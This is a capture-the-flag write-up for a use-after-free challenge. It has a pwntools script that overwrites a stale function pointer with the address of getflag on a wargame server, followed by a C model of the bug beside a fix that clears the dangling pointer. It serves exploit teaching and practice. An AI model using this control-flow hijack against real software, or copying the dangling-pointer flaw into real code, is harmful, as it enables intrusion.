[Wargame] CERTIS uaf

Posted by MrBIN on November 17, 2016

Uaf

  • A use-after-free (UAF) vulnerability challenge.
  • Overwrite the hello function pointer to jump to the getflag function.


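from pwn import *

s = remote("wargame.kimtae.xyz", 10015)

# Address of getflag, packed as a 32-bit little-endian pointer
get_flag = p32(0x080486E6)
# 40 bytes of padding, then the value that replaces the hello function pointer
payload = b"A" * 40
payload += get_flag

s.recvuntil(b"Input ID : ")
s.sendline(b"mr_binmr_bin")
s.recvuntil(b"Input PW : ")
s.sendline(b"7")

# The memo is written into the reused chunk, over the stale function pointer
s.recvuntil(b"Input Memo : ")
s.sendline(payload)
print(s.recv(1024))

s.interactive()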
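
The bug class behind the script above, modelled next to its fix. This is an added example, not the challenge's source: the struct layout (a 40-byte ID buffer followed by the callback), the one-slot pool that stands in for heap reuse, and the names `pool_alloc`, `pool_free`, `build_memo` and `run_session` are all assumptions made for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed layout: 40-byte ID buffer, then the callback (hence the 40-byte pad). */
struct account { char id[40]; int (*hello)(void); };

/* One-slot pool standing in for the heap: freed storage is handed out again. */
static union { struct account acct; char memo[sizeof(struct account)]; } slot;
static int slot_used;
static void *pool_alloc(void) { if (slot_used) return NULL; slot_used = 1; return &slot; }
static void pool_free(void *p) { if (p == (void *)&slot) slot_used = 0; }

static int hello(void)   { return 1; }  /* intended callback */
static int getflag(void) { return 2; }  /* must not be reachable from a memo */

/* Constructed memo: 40 filler bytes followed by the address of getflag. */
size_t build_memo(char *out)
{
    int (*target)(void) = getflag;
    memset(out, 'A', offsetof(struct account, hello));
    memcpy(out + offsetof(struct account, hello), &target, sizeof target);
    return offsetof(struct account, hello) + sizeof target;
}

/* Login, logout, write memo, greet. Returns the callback's result,
   or -1 when the stale handle is refused (hardened path). */
int run_session(int hardened, const char *memo_bytes, size_t len)
{
    struct account *user = pool_alloc();
    memset(user, 0, sizeof *user);
    user->hello = hello;

    pool_free(user);                 /* account released */
    if (hardened) user = NULL;       /* fix: drop the dangling pointer */

    char *memo = pool_alloc();       /* same storage, now holds memo bytes */
    memcpy(memo, memo_bytes, len < sizeof slot.memo ? len : sizeof slot.memo);

    int result = user ? user->hello() : -1;  /* vulnerable path calls via memo data */
    pool_free(memo);
    return result;
}

int main(void)
{
    char memo[sizeof(struct account)];
    size_t n = build_memo(memo);
    printf("vulnerable: %d, hardened: %d\n", run_session(0, memo, n), run_session(1, memo, n));
    return 0;
}
```

Clearing the pointer at the point of release is what separates the two paths; the memo bytes are identical in both runs.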
